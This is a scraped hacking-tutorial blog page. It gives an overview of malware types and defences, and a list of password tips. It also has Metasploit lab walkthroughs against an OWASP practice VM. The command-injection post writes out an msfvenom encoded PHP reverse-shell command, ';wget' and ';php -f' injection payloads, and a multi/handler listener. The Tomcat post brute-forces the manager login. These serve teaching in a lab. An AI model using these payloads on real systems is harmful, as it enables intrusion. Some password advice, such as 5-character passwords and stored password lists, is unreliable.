Kali Linux

Kali LInux Tutorials

Hacking Castle

Hacking Castle

Hacking

Ethical Hacking and Cybersecurity Tutorials

Metasploit

Hacking with Metasploit

SQLMAP

Hacking in android in termux using sqlmap

Tuesday, November 3, 2020

Malware (Malicious Code) Full Guide (Viruses,worms,etc)

In this article I'll be discussing series of lessons on Cyber Security, with today's topic focusing on malicious code, which is also known as malware.

What is Malicious Code (Malware Definition) ?

 Malicious code or what malware is software that is written for the purpose of intentionally causing some sort of unanticipated or undesirable effects

 

Note that the terms malicious code, rogue program and malware all refer to the same underlying concept, and I will hence use these terms interchangeably. 

From a conceptual perspective, one of the most critical things to understand about malicious code is that it is only distinguished from other types of software programs by the intent of its developer

If a developer writes a software program, with the goal of causing harm to other people or systems, or at least problems for other people or systems, then we can classify that software program as malicious

Since the only conceptual difference between malicious software programs and non malicious software programs is the intent of the developer, it's important to realize that malicious programs can do anything that a normal non malicious program can do. 

Just as with a normal non malicious program, malicious software programs can access and use system resources, and can alter both data and other programs residing on a system if that's what they've been designed to do. 

Although many people have the impression that malicious code is a relatively new concept. 

In fact, researchers have been aware of malware threats for many many decades. virus behavior, for example, was described by Willis were as a threat to computing systems in his 1970 study for the defense Science Board. Remarkably, many of the concerns and threats that were documented in this early report are still perfectly valid even today.

Malware (Malicious Code) Full Guide (Viruses,worms,etc)


Many different types of software programs can be classified as malware, with some of the most common types of malware being viruses, worms, Trojan horses, zombie programs, logic bombs, time bombs, rabbits, trap doors, and script attacks.


Perhaps one of the most well known types of malware is a virus. 

What is Virus ?

In the context of information security. A virus is a hidden, self replicating computer program that propagates itself by infecting other programs or system memory. 

 Note that viruses can be broadly classified into two groups, transient viruses and resident viruses. 

 

transient viruses are those viruses that are active only when their host programs are executing.

 While resident viruses are those viruses that establish themselves in system memory, and have the ability to remain active even after their host programs have been terminated. 

We'll examine viruses more closely a bit later. 

What is worms ?

 Although a worm and a virus have many similarities, a malware worm is distinguished from a virus by its ability to propagate a complete working version of itself onto another machine or device by means of a network. 

 

What is Trojan Horse ?

 Trojan horse is a computing program that appears to have a useful function, but which also has a hidden and malicious purpose. 

Trojan horses are commonly able to evade security mechanisms by exploiting the legitimate authorization of the user who runs the program. 

Imagine, for example, that you downloaded a game app for your smartphone. When you launch the app, you're able to play the game. But unbeknownst to you, the app has secretly made a copy of all of the information in your contacts list, and has transmitted that information to a remote server. 

Aside from viruses, worms and Trojan horses, several other types of malicious code exist as

What is zombie ?

for example, is a malicious program that is designed to allow a computer to be controlled remotely by a master machine. 

computers that have been turned into zombies are often used by malicious parties for purposes such as launching a distributed denial of service attack against a target organization or network. 

What is Logic Bomb ?

 logic bomb is a type of malware program that is designed to activate itself when certain conditions are met.

 One of the most popular types of logic bombs is called a time bomb, which is a logic bomb that activates at a specified date or time.

 Time bombs can be used by malicious parties for purposes such as launching a distributed denial of service attack, on a holiday, or on the anniversary of some event. 

What is Rabbits ?

With respect to viruses and worms, a rabbit is a virus or worm that replicates itself without limit for the purpose of draining or exhausting system resources. 

In the real world, rabbits are well known for their productivity to reproduce in large numbers. If the population of rabbits is constrained to an area with a limited supply of resources, eventually the rapidly growing number of rabbits will consume all of the available resources. 

One of the characteristics of computer systems is that they also have limited resources. And I hope this example makes it clear why a virus or worm that replicates itself without limit is known as a rabbit. 

 What are Trap doors or Backdoors ?

 Trap doors, which are also known as backdoors are hidden software devices that are installed by a malicious party in order to gain surreptitious access to a computer system, while avoiding or circumventing the system security mechanisms. 

 

What is Script attacks ?

 Script attack refers to malicious code that has been written in a scripting language such as JavaScript that is designed to be downloaded and executed

When a user loads a webpage. Script attacks capitalize on browser vulnerabilities, or the web's same origin policy in order to gain access to sensitive or private information. Script attacks are quite popular, and have been found by recent research to account for at least 80% of the security vulnerabilities on the web. 

There are of course, many other varieties of malicious code. But the nine types of malware described previously provide a solid representative sample of current malicious code based threats.

 Although many malware programs are indiscriminate, that is, they are not selective in the people or systems that they attack. It's important to realize that there are also many targeted malicious programs that have been written for a very specific purpose. 

What are Targeted Malicious Code ?

Targeted malicious code might be designed to attack a particular system, organization, application or network, or to carry out a very specific malicious task. 

An excellent example of targeted malicious code is the Stuxnet worm, which was specifically designed to infect the programmable logic controllers on the Siemens industrial control systems that we're being used by the Iranian government in its efforts to enrich uranium. 

A useful way of studying and classifying malicious software programs is to evaluate those programs from four different perspectives. 

  • we can consider the extent to which a malware program causes harm. And we can accomplish this by determining how the program negatively impacts users or systems with respect to harm. Remember that malware programs often run with the full authority of the user. And if a user has high level system access, malware programs can hence cause essentially unlimited harm to a system.  
  • we can consider the way in which a malware program transmits or propagates itself. And we can accomplish this by determining how the program replicates and spreads. malicious programs can potentially transmit and propagate themselves in many different ways, including via files, downloads, documents, scripts, networks, and so forth. 
  • we can consider the ways in which a malware program becomes active. And we can accomplish this by determining how the program establishes itself, and gains control of system resources. Many different activation vectors exist for malicious programs. And most of these exploit some sort of system vulnerability.
  • we can consider the stealth characteristics of a malware program by determining how the program hides itself to avoid detection. In order for a malicious program to survive, it must avoid being detected not only during the installation process, but also while it is executing and while it is dormant or inactive. Further, once a malicious program has been detected, instances of the program must be removed faster. The program can propagate itself if we hope to cleanse the infection. 

As promised, we will now take a closer look at how computer viruses work. 

Recall that a virus is a hidden self replicating computer program that propagates by attaching itself to other programs. This means that the host program to which a virus is attached must be executed at least once in order for the virus to spread. Recall also that a certain type of virus known as a resonant virus, can establish itself in system memory and can remain active without its host.

For this reason, even a single execution of the host program can be sufficient to spread the virus widely. 

Let's consider a few examples of virus propagation. 

First, imagine that a virus is attached to a program installer file. A user will hence activate the virus when he or she runs the installer program. After being activated, the virus might install itself in all of the programs currently executing in the system's memory. From this point, the virus will spread further whenever any of the infected programs is executed. 

As another example, imagine that a virus is contained in an attachment to an email message. In this case, the user might activate the virus simply by opening the attachment. From this point the virus can install itself and spread throughout the user's machine.

Classification of Viruses

 viruses can be classified into four different categories according to the ways in which they attach themselves to their host programs. 

Classification of Viruses

 

  • Appending viruses

 Appending viruses and appending virus attaches itself either to the beginning or to the end of a host programs code. 

Most often, appending viruses insert themselves into an executable host program in front of the first legitimate program instruction. In this way, the virus code will run whenever the program is executed. 

  • Surrounding viruses

 A surrounding virus attaches itself to its host program in such a way that it will execute both before and after the host program executes

developers of surrounding viruses often use this strategy in order to allow the virus to cover its tracks. That is, the component of the virus that runs after its host program has finished executing can be used to mask the presence of the virus. 

  • Integrating viruses

 Integrating viruses incorporate themselves into the middle of a host programs legitimate program instructions, thus defeating antivirus software that looks for virus signatures at the beginning or end of an executable program file. 

  • Replacing viruses

 Replacing viruses, which are designed to entirely replace the real, legitimate code of the infected program file

                                                --------    

The Perfect Virus..

From the perspective of someone wishing to design a virus, there are several highly desirable virus characteristics that the designer can seek to incorporate into his or her virus. 

An ideal virus should be difficult to detect, not easy to destroy or deactivate, and should propagate itself widely and rapidly. 

Further, an ideal virus should be able to reinfect programs that have previously been infected, and should be machine and operating system independent. 

With respect to the latter of these considerations, imagine how effective a virus would be if it had the capacity to infect any type of device, including smartphones, tablets, PCs, and servers, running any type of operating system, be it Windows, Mac OS, Linux, Unix, iOS, Android, or so forth.

 

Now that we know a bit about how computer viruses attach themselves to their host programs, we can consider the question of 

where to hide a virus ?

  • viruses can be hidden in many places on a computer system, including the boot sector, in the system's memory, in application programs, in library files, and in many other widely shared files and programs. arguably the best place for a virus to be hidden is in a machines boot sector.


  • A boot sector is a region of a storage device that contains program code, which allows a computer to load its operating system. When a computer is powered on the BIOS loads the program code from the boot sector into the computer's memory. The computer then executes To this program code in order to initialize its operating system and complete the boot up process. 
  • Since virus detection programs are application programs, the operating system must be running in order for a virus detection program to be running. by hiding a virus in the computer's boot sector, then, the virus may be able to avoid detection, since it will have been activated before any virus detection programs were activated. 
  • Another common place for viruses to be hidden is in system memory. on modern computing devices, it is common for hundreds of programs to be executed upon system startup. 
  • If any of these programs is infected with a virus, the virus might propagate by attaching itself to the other programs currently contained in the system's memory. In this way, even if the original host program is terminated, the virus will continue to be active.

 Operating System programs, or common user programs are good targets for this type of virus, since such programs are likely to be activated often. In addition to hiding viruses in the boot sector or in system memory, viruses can also be hidden in application programs. 

There are certain applications that allow users to write and execute macros, and these macro enabled applications have proven to be common targets for viruses. 

  • Since clever virus developers have been able to exploit security flaws in those applications in order to propagate and run malicious code. library files such as DLL files are also a common target for viruses, because they are used by or shared by many different programs. When any of the programs that relies upon one of these shared library files is activated, the virus in the infected library file will also become active, thus allowing it to rapidly propagate. Other widely shared files and programs may also be good targets for a virus. 

It's possible for example, for a virus to be hidden inside of a data set that is shared by many users, thus allowing the virus to spread quickly. 

  • Another interesting place to hide malicious code is inside digital images such as JPEG files. There is in fact an entire science, known as steganography, which examines how information can be concealed. Many methods and tools have been developed in recent years, which allow malicious code and other information to be secretly hidden inside common types of computer files. And these files are thus good targets for viruses. 
  • Finally, and amusingly, a good place to hide a virus might be inside of a disreputable virus detection program. Users who acquire and activate such a program in the hopes of preventing a viral infection may by doing so, actually cause their system to become infected. 

Virus Signatures and its Pattern

In order to understand how viruses are detected, we first need to understand that viruses leave behind a unique signature, which can be defined by one or more patterns. 

If a virus is to survive a hard reboot, that is a reboot in which the power to the computer is switched off and then switched back on, it must be stored somewhere on the computer's non volatile storage device, such as a hard disk or a solid state drive. 

This creates a storage pattern for the virus. Further, a virus interacts with system resources in a particular way while the virus is running. 

And these interactions create an execution pattern for the virus. Finally, a virus spreads or propagates itself in a particular way, thus creating a distribution pattern for the virus.

 virus scanning programs use one or more of these types of patterns in order to detect viruses. Such software programs may scan the system's memory, or it's hard disks or solid state drives, including the boot sector in an effort to detect any virus activity on the machine. Additionally, virus scanners can use techniques such as file checksums, in order to detect changes to important files.

Virus Scanning and Removing Programs...

Virus Scanning and Removing Programs.

 

When a virus scanning program finds a virus, it will typically try to remove it by extracting all of the pieces of the virus from its host programs and from the system's memory. 

One of the major challenges faced by virus scanning programs are polymorphic viruses, which are designed to modify their signatures as they execute in order to avoid detection. 

Note that there are typically hundreds of new viruses identified every day. And as such a virus scanner and its database of virus signatures must be kept up to date in order to be effective. 

Virus Removal and Post-infection Recovery

fixing a system after it has been infected by a virus might be accomplished in a number of different ways, depending upon the virus and the nature of the damage that it is done to the system. 

Ideally, we would want to disinfect the system by removing the virus from any infected programs without damaging the programs themselves. Unfortunately, this can only be accomplished if the virus code can be separated from the program code. And if the virus did not corrupt the program.

If the virus cannot be separated from the program file, then the file must be permanently deleted. If one or more files is deleted by the virus itself, or is deleted in the process of disinfecting the system, then restoring the system to its original state will require that we recover or replace all of the deleted files. 

This emphasizes the need to maintain file backups, especially of important files. Without backup copies of the files that have been deleted either by the virus itself or as a consequence of the disinfection process, it will be extremely difficult to restore a system to its original state. 

identifying digital object has been modified by malware

Among the most important tools that we have available for identifying when a digital object has been modified by malware, our error detecting codes there are several varieties of these error detecting codes, including parody bits, checksums and cryptographic checksums, which, when used properly, can help us to detect when a program or file has been surreptitiously altered by a malware program. 

A parity bit or a check bit is the simplest form of error detecting code. The process involves appending a single bit of data, either a zero or a one to a string of binary data, in order to indicate whether the number of ones in the string is even or odd. 

If the binary data in the string has been altered, and there is a 50% chance that the parity bit will detect the modification, a checksum is a value that is computed by running a file through a hash function or a checksum algorithm

Because the hash function or checksum algorithm will produce different values for different combinations of input data. the integrity of a file can be verified by computing the files checksum and comparing the result to a known checksum value. If the two values differ, then we can be reasonably sure that the file has been modified.

 The developers of malware are of course, generally quite clever, and many of these clever developers have found ways of modifying programs or files, such that they generate the same checksum value as the unmodified program or file, thus making it appear as if the program or file has not been altered. 

For this reason, a cryptographic hash function can be used to generate a checksum value that has an extremely low probability of being duplicated after a file has been modified. It is also important to note that, under certain circumstances, error correcting codes can be used to restore programs or files that have been surreptitiously altered to their original state without requiring a clean, unmodified copy of the original object.


Reducing Harm from Malware Infections

Reducing Harm from Malware Infections

 

In addition to checking whether digital objects such as programs or files have been surreptitiously modified, there are also several mechanisms that can be used to reduce or contain the harm caused by a malware infection. 

First among these is the principle of least privilege. This principle states that users should have access to the minimum number of digital objects and system capabilities necessary in order to perform the tasks that they need to perform. 

A malware program that runs with the authority of a system administrator has the potential to cause much more harm than if the same malware program were run with the authority granted to a low level user account. 

Second among these mechanisms is the principle of complete mediation. This principle states that we should check whether a user is allowed to use a digital object each and every time. Access to the digital object is requested. 

Finally, we have the mechanism of memory separation. When implemented properly, memory separation ensures that each user's digital objects are isolated in memory from other users objects, thus preventing cross contamination. It is important to realize that most single user systems, such as home computers, laptops, tablets, and so forth, are not properly configured to capitalize on hierarchical code sensitivity and capability. 

Since most people use a single user account on their personal computing devices, which has high level administrative access to the system. 

 

How to Be Secure from Malware.. ? 

How to Be Secure from Malware

 

Just as with Malware infections, adopting proper malware hygiene can help us to substantially improve our chances of avoiding a malware infection. 

  •  It's good practice to use up to date anti malware software that has been supplied by a trustworthy vendor.
  • New or unknown software programs should always be tested on an isolated device if possible, especially if the software is to be used in an organizational environment. 
  •  Users should be trained to recognize and open only safe attachments and data files. 
  • Users should be made aware that any website might be harmful, even if the website has been safe in the past.
  •  If restoration of the system becomes necessary, it's important to keep a recoverable system image in a safe place, and to have backup copies of executable system files available. 
Even with all of these hygienic precautions, there are still no absolute guarantees that we can avoid a malware attack. By following these steps, however, we can vastly reduce our chances of acquiring a malware infection

Interesting facts about Malware

As food for thought in our consideration of malicious code, I would like to discuss some truths about malware. 

  • Malware can infect any platform. 
For many years, there has been a persistent belief that devices running Mac OS or iOS operating systems are immune to malware attacks. This belief is absolutely false. All computing systems can be affected by malware. 
 
  • Malware programs can modify hidden and read only files. 
Many people believe that if a file is hidden or marked as read only, then it will be immune to modification by malware. Remember that malware programs often run with elevated privileges, and can easily change whether a file is hidden or read only. 
  •  Malware can appear anywhere in a system. 
Many of the developers of malicious programs are extremely intelligent and extremely talented. And there are hence no dark corners anywhere in a computer system that are immune to malware. 
 
  •  Malware can spread anywhere where file or data sharing occurs. 
Malware programs have many ways to propagate themselves, and we should therefore not expect any communications channel to be safe from malware.
 
  • It is not possible for malware to remain in volatile memory after the power to a system has been completely switched off. 
Nevertheless, if a malware program is saved on a disk or a solid state drive, for example in the boot sector, then it may reappear when the power is restored. 
 
  • It is possible for malware to infect the software that runs hardware devices. 
firmware viruses do exist. 
 
  • Malware can be malevolent, benign or benevolent. 
Although the vast majority of malware is written with malicious intent. The same techniques that are used to develop malware programs, such as viruses and worms can be used to achieve positive or munificent objectives. 
 
As an example, consider this question. Would you mind having a  virus living on your system? 
 
Well, Thus ends our overview of malicious code. I hope that you learned something interesting in this lesson. 
 have a great day.

and Happy Hacking..

Share:

Friday, October 16, 2020

How To Save Yoursef from hackers (For Everyone)

 As technology advances overtime, it's been positively used to assist sell corporations, services or products in addition to improving websites. But at some point, it has been negatively also used by culprits to "crash" websites and businesses even hacking passwords to the software.

 As the increasing variety of instances of hackers used to hack websites or malware attack stated in information, horrific impact brought approximately via technology is also continuously rise System hacking is one of the most common issues nowadays.  

Cyber Security Threats


That is why to settle this problem, security concerns and issues have been tackled because Internet is now widely use by people from all walks of life. Whether a business is large or small, proper attention should be given like protecting and safeguarding all their network software against corrupt hackers.

 That is why it is vitally important that every system operators or administrators must use a distinctive password that can't be hacked either by an ordinary destroyer or professional hackers. As early as possible, one should be vigilant from unexpected hackers.


Basically, a person who does hacking commonly destroys software and other computer networks in order to gain more money or only encourage doing the challenge. To avoid unnecessary accidents like hacking passwords, you should take some precautionary measures not only for your systems protection but also for your own safety as well.

 That is why the need of powerful password is a must for privacy and security of your website. It ensures you the confidentiality and safety of your save data. It is a great responsibility of the user to make a password as unique as possible in a way that complicated to guess or to be discovered by anyone.


To avoid hacking on your password, the following are the points to consider when creating a virtual keyword.

 

 

avoid hacking on your password


1. When creating a password, you should enter mix information like in your credit card, bank account or any assume a name that is extraordinary.


2. A second good advice is to use alphanumeric, a combination of numbers and letters even mix with symbols. For a higher security, at least two letters that you enter should be in uppercase.


3. Creating a password should be hard or rare to be guess wherein other programs and even other people can't quickly discover.


4. A word should not an existing name regardless of any language used.


5. Don't use your initial names, date of your birth and other common words because it can be easily guessed.


6. Don't use other older accounts.


7. The password to enter should be 5-digit or more for additional security.


8. Do not try to use usual passwords.


9. Having two or more accounts for your email, you must use another password. Be sure that you will memorize your entire password to avoid failures.


10. The last but not the least tip is that try to have a list base on your common used programs like notes, excel or word to all your websites, mail boxes or either through your subscriptions and mail back to its right place or location. Your password and username use should be neat and properly organize so that you can immediately use it.


After making a virtual password into your account, should also take consider on how to secure your valuable website against from accidental attacks and cruel hackers. The following are the pointers to consider:

 

Protect Yourself



1. Install a virus protection on your software to have a complete safeguarding on your website.


2. Modify and transform your password always by selecting alphanumeric words. To avoid committing of failures, be sure that you have a list for every password and username that you made.


3. Keep updating on your use safety measure patches to avid harmful viruses that might enter in your systems like Trojans.


4. Connect to Google webmaster wherein it will help or assist you to learn on different hacking endeavors.


5. Lastly, you should always have back-ups to restore the date you save.


After reading the entire article, make sure that you follow those helpful tips so that you can be ready and alert always for any hacking attempts. 

It's up to you if you follow it or not, but it assures you to have a maximum protection for your software, network and even your invested website. 

If you're top priority is to stay away from hackers who do hacking passwords, then you should bear in mind and take into action those easy and simple tips above.

Share:

Saturday, October 3, 2020

Complete Metasploite Guide (Part-5 OS Command Injection)

 

Let us actually get started with some of our first exploitations. So what you want to do is open up your msfconsole, first of all open up our OWASP virtual machine as well. So for me it is already up and running. If it is not for you, you want to open it. And let's go open up our Firefox for a moment. Now what we will be doing in this tutorial is basically I will show you how you can get the meterpreter shell back with the command injection attack.

 I will also show you how to do the same thing with the PHP injection vulnerability. Now we didn't cover PHP code injection but it is simple, and it is almost the same as the other injections that we did before. So it is just injecting a certain type of code and injecting it into a browser that isn't very well filtered. So the user input is also read as a code. 

So let us, first of all, go to the OWASP virtual machine. So my Ip is 192.168.56.11 It will open up our standard OWASP virtual machine welcome page, where we have all of our stuff that we need. we want to go to the bWAPP right here. Now the login is the same as before, so bee and then bug right here in order to log in.  Press enter, and you are logged into BWAPP. then choose os command injection



So we will use burpsuite as well with the mixture of Metasploit, and with the mixture of the OWASP virtual machine. So we will be able to inspect packets in burp suite, and we will be sending some of the other stuff into the website, such as our meterpreter shell, and such as some of the other commands.  

So before we do any of that, just go to the proxy intercept and turn the intercept off so we can load the pages properly. Now when we go to the page and we reloaded once again, we successfully connect to it. And here what we  chose is the OS command injection. 

And right here we are performing the DNS lookup. So let's see what happens when we just run this with the default server right here. We can see server and then this IP address address, so this basically the router, and then we have some of the other options as well. So IP address at the end is this one, it doesn't even matter. So what matters for us is what happens if we run that. And then after that we also specify ls, which is the command to list all of the directories and files in that sub directory. So we click here ls, and just as simple as that we can now see that this website is vulnerable to the command injection. 
os command injecion


It also specified all of the files that it has in that directory on its machine, which it shouldn't be specifying. So now that we know that, what we want to do next is basically we want to make a meterpreter shell that is basically running over PHP. 
Now, why over PHP? 
As we can see right here all these files are in .PHP, and we can actually upload the shell on this web server, and run it, make the web server connect to our virtual machine. So let us do that by starting off with creating the meterpreter PHP shell. 

So this is where we introduce, for the first time, the msfvenom tool, which we will use in order to create the meterpreter shell. So we need to leave this and let's open a new terminal. 

msfvenom

 and then after that, basically, if you want to you can just type --help. I believe it will print the available options, but let's not bother with this at the moment. Just follow with what I'm typing and I will explain while I'm going through it.

#msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -e php/base64 -f raw > shell.php

 So msfvenom... now -p option will actually after that specify the payload that you will use. So we want to use PHP meterpreter and then reverse TCP. So php/meterpreter/reverse_tcp. 

Reverse TCP working

 I made a simple illustration of our reverse TCP shell means. So we have our PC right here which is the attacker's PC. This is our good old Kali Linux machine that's for the attacker. And here we have the victim machine which we are attacking. So we want to send the shell to the victim machine. This is in our case the OWASP virtual machine, 

So the problem with connecting, just simply connecting to the open port, is that this machine might have a firewall around it. Not might, basically all of the machines. All of the networks nowadays have firewalls, but what firewall cannot prevent is the victim machine connecting back to us. 

Now how will we do that? 

What we want to do is we want to send the file to this machine right here. The file, so shell.php is that file and we sent it to the victim machine, and what that file would do is basically it will initiate the connection with us. 
So this file when it is run on the victim machine, or when it is started up on the machine, it will try to connect to us. So the firewall won't be able to stop it since the victim machine itself tried to connect to us. And while it tries to connect to us we will be listening for the outgoing or incoming connections. And once this program is started it will connect back to us, and we will be able to communicate with this machine and execute commands in it, and so on and so on. 

But you might be asking, how are we going to get that file on the victim machine? 

Well, that is simple. If the victim machine is vulnerable to the PHP code injection or to the OS command injection, we will be able to execute it just by making the machine download it with command injection. 

But if, for example, the machine isn't vulnerable to anything, which we will cover in the later articles when the machine doesn't have any vulnerability, the only way for the victim to download that file is if it clicks on the download button and if it runs it itself. We will not be able to run the file for the victim itself. Or, there is another way. If the victim is physically close to you, you can actually take your USB drive, transfer the file onto the USB drive, and transfer to the victim machine while they are not looking, or something like that, and then run the file. And basically, you just did all of this process by yourself, just being physically on their laptop or on their PC. 

So, I hope you understood this. So, the basic idea behind this is that the victim is trying to connect back to us with our malware program, or with our PHP meterpreter shell. 

So let us continue now with actually making this. Now the name of that shell is meterpreter. We will use it with PHP and we use the reverse TCP connection. Now there are some of the other options as well but we will use these ones for now. 

Now after you specify all of this, the next thing we want to specify is the localhost IP address. Now, what is the localhost IP address? That is the IP address of the host that's listening. Which in this case the host that is listening is you. So you as an attacker are the listening host. So, what we need to specify right here after the LHOST, then equals and then the IP address. So let me just check what the IP address is from this machine. So ifconfig... And then we specify 10.0.2.15 

And after that, we need to specify the out port as well, and that is the port that you are listening to. It is also your port. So, by default Metasploit is set on the 4444 port, so we will just keep with that. So just 4444, select that, and after that you can select some of the other options that are actually optional. 

So, we will select that so I can just show you. For example, let's use the encoder. Now the encoder...I covered what an encoder is in the previous article. So basically it's used to most likely bypass antiviruses, which actually we do not need in this case but I will show you how you can use it. So the encoder will scramble the code, we will not be able to see the code itself in raw format. We will be seeing scrambled, encrypted code. So the encoder that I will use is php/base64. 

What else we want to specify at the end is -f, and then file to be raw, and after that, we want to specify this narrow and just save that into shell.php Once we select all of this and once we double-check all of the options that we set, you can click click here enter, and this will take a few seconds to finish. 

So, our meterpreter PHP shell is now 1503 bytes large. If you press here ls, you'll be able to see it is right here. So this is our shell.php, this is our malware, and this is our program that we will be sending to the victim machine. We created it with this command. Now there are a few things that you need to do when you make the PHP reverse shell. 

First of all, you need to add the PHP tag. since it doesn't come with that. So, this is the scrambled code. This is basically Base64 encoded code as we can see right here. This is the function that is used to decode the base64. We can see this doesn't look anywhere close to the programming language but that is why we use the encoder, so it doesn't get detected by antivirus on legit websites. So, what we want to do is add the PHP tag. So, first of all, up here we want to add this tag, and then a question mark and then PHP. So that is the opening tag, and at the end we want to add the question mark and then closing tag. You need to add this in order for the program or for the machine to recognize this as the PHP code. So, ctrl + O to save, ctrl + X to exit. 




And now we are good to go. The only thing we need to do right now is set this file or program somewhere where it can be downloaded from. Now that place would be the XAMPP Apache 2 web server. So you want to send this to your XAMPP webserver. So let us go to /opt/lampp/htdocs/, which is the location of all the programs that are available on your XAMPP web server, basically whatever path to your shell.php is, and move it to /opt/lampp/htdocs/I made one folder named shell so mine directory is /opt/lampp/htdocs/shell. And we can see that right now we have this shell.php right here. 

 now the next thing we want to do is make sure that XAMPP is running. We can see that is active and running. And right now what we want to do is go to our IP address, which is localhost/shell, 


and we can see that right here we have available online the shell.php file. Now what we want to do, we want to make that victim PC actually downloads this file. So how do we do that? Since it is vulnerable to the command injection,  you want to do is use a simple tool that is on all Linux systems, which is called wget. Now, wget is basically used to download the file.  And let's actually go to root and mkdir test, and go to test. Here we do not have anything. But if we run this command wget, and then we run localhost and we need to specify what we are downloading. So we need to specify the /shell.php since that is the name of our file that is located in the www/html folder.
Which looks like this,
 
wget  localhost/shell/shell.php
 
 
We press here enter and this will download the file for us. As we can see it downloaded shell.php just with this simple one command. So if I type here ls once again, we can see that the shell.php is in our folder.  So now if we cat it we can see that we get the entire file right here. Now this was only the problem with the Apache 2 from my Kali Linux web server. So don't mind this, you should be good to go. And let us continue with the attack. So right now what we want to do is perform the command injection. 
 
So we know that there is a vulnerable input, and let's actually exploit it right now.
And let us right right now type the same command. So
 
;wget localhost/shell/shell.php 
 
Now try to find if right now it successfully downloaded the shell.php So it should be somewhere around, we successfully got the shell.php file on our target machine with a simple command. And we didn't have to make anyone click on anything, or we didn't have to make basically any physical contact with that machine. Now in order for you to execute this file you will need to type a certain command. But before we type that command, we need to start listening on a certain port. 
 
So let us open our msfconsole so we can continue with this attack. Right now before we execute the shell.php on the victim, we want to start our listener in our Metasploit framework. So this is opening. What you want to use right here is something called exploit multi/handler. 
 
So this is something that you will use a lot. Just type here
 use exploit/multi/handler
Metasploite exploite multi handler

 
 
If you show options, you can see that there are no options right here. So what you want to do is set the payload, 
set payload php/meterpreter/reverse_tcp 
 
and we can see that we get the whole LHOST to listen on. Now double check the port we specified in that command while we were making shell.php that the LPORT is 4444, and the LHOST is the IP address of our own machine. So we listen to our own connection. So set LHOST 10.0.2.15 
 
Metasploite exploite multi handler payload

 
 
And all I need to do is type here exploit right now, and this will wait for an incoming connection. So right now we are waiting for someone to run that program on the target machine. But since nobody will really do it, we have to do it ourselves. And we can do it since that server is vulnerable to the command injection. So just type ; and then what we want to do is basically php -f and then shell.php. This command right here will run the PHP file. 
 
;php -f shell.php
 
And we can see if I press here Lookup, we get a meterpreter session 1 opened. We can see right here that it is on a connection from our OWASP virtual machine, or basically this is a connection from our OWASP virtual machine, which it's IP address, and the IP address of this is our Kali Linux machine. So we successfully got meterpreter open. Now that will be about it for this tutorial. We will cover the other exploits as well, and we will also show what we can do with a meterpreter session open. So what can we execute, what post exploitation tools can we use, and so on and so on. So that's about it for now. I hope I see you in the next tutorial and take care. Bye!
Share:

Wednesday, July 15, 2020

Complete Metasploit Guide (part-4 Bruteforcing Tomcat with msf Auxiliary)

 Hello everybody and welcome back. And now let us perform another scan or another attack on our OWASP virtual machine. So, start off your Metasploit framework console. We will perform once again Nmap on this OWASP virtual machine in order to see the available services running.

we will attack the Tomcat server. But let us first run the Nmap. So 192.168.56.101 is my OWASP IP address

metasploit Nmap Bruteforcing Tomcat with msf Auxiliary


 we will attack the Apache Tomcat funding on port 8080. Now there is an auxiliary module that is in this Metasploit framework that can be used to attack it. So here it is, and we can see on Port 8080/tcp there is Apache Tomcat running. So what we will basically do is we will actually brute force the Tomcat server. 

So let us actually search for Tomcat and see what kind of available exploits and auxiliary modules we have. So, right now we are only interested in the auxiliary part.
so type 

#search tomcat

metasploit Tomcat msf Auxiliary


So, what we want to use is 

auxiliary/scanner/http/tomcat_mgr_login

Tomcat application manager log in utility. As we can see, this one doesn't have the date of when it came into the Metasploit as well. It is ranked as normal. So, let us use that one. now if you do not want to copy the module you can just type it. So, auxiliary and then tab to complete, scan, and then tab to complete, http, and then tomcat_mgr_login. 

#use auxiliary/scanner/http/tomcat_mgr_login

So once you click enter on that one you can just check it with show options. 

metasploit auxiliary options


So we can see what are the available options that we have here. Now this one has even more options  So let us see what we can do with this. 

BLANK_PASSWORDS is false. 
BRUTEFORCE_SPEED, now brute force speed we will leave on five which is max.
We can try to set threads to more so it actually goes faster. 
The other options: DB_ALL_CRED, DB_ALL_PASS, DB_ALL_USERS are not required and we will not put them. Password we do not need since we want to specify the password file list and the user name file list. 
As we can see by default, this auxiliary module has a PASS_FILE already listed. It is in usr/share/metasploit- framework/data/wordlists and then tomcat_mgr_default_users.txt. So this is a file containing passwords one per line. 
 we have it split in a password list and in a user list. So we will stick with this one since it is by default. I guess it has some good Tomcat default passwords and users. 
Proxies we do not need. 
What we do need, and what we will always need, is the RHOSTS. So we need to select the RHOSTS which is our targets IP address. So it is one 192.168.56.101, press enter. 
So we selected the RPORT is 8080 unless it is running on some other port. Now since we did the Nmap scan on our OWASP virtual machine we know that it indeed is the port 8080. So we will leave it on that. It is also a required thing. So these two things will always be required. You cannot perform scan without this. So that's important to know. 
The next thing SSL is not required. 
Stop on success. 
Now stop on success we want to set to true since we do not need to continue brute-forcing it after we find the user name and password. So let us change that. So set STOP_ON_SUCCESS from false to true,  

The next thing TARGETURI is manager/html, which is good. So this is a good path, but let's just check. So if we go to the browser, this is basically the path to the login page of the Tomcat server. We go right here and we go to 192.168.56.101. We need to specify the port since Tomcat is running on port 8080, and then we go manager/html 

Metasploit framework tomcat login page


Let's see. Yeah, of course, it does prompt us with a user name and password. So basically what we are brute-forcing Is this right here. Once we find the user name and password for this we will be able to change the settings on the Tomcat server, web server. So let us close this for now. we got the error 401 unauthorized since we didn't specify the user name and password. But, that is soon about to change, hopefully, if we find the correct user name and the correct password. 
The next thing that we need is verbose which is set to true. 
So everything is set. 

Metasploit framework tomcat scanner options


And now what we want to do is click here run or exploit. So you can use both of those words and just press your enter. 

Metasploit framework tomcat login bruteforce


We can see it goes relatively fast. It actually went faster than I thought. we did find the user name and password as we can see a plus sign right here. 
It says login successful, root and owaspbwa. Root is the user name and password is owaspbwa, which we will soon check. But let me just try to run this, it went too fast. 
And now let's actually use this username and this password to log in to the webserver. So we reload this page. It will ask us for user name which is root, and the password which is owaspbwa. We press here OK, and we can see that we successfully logged into Tomcat web application manager, where we can now change all of these settings if we want to. And this shouldn't be available to us at all as a user of the website. So that'll be about it for this attack. We covered the Tomcat auxiliary module.

Metasploit framework tomcat login


We used scanner/http/tomcat_mgr_login, which we used to brute force the Tomcat on port 8080, and we successfully did it. So that would be it for this tutorial. In the next tutorials we will start off with some of the exploit modules and we will try to exploit some of the more advanced things, such as PHP injection, command injection, we want to get the Meterpreter shell back. So that would be about it for this tutorial and I hope I see you in the next one.

Happy Hacking..
Share:

Tuesday, July 14, 2020

Complete Metasploit Guide (part-3 Bruteforcing SSH with Auxiliary)

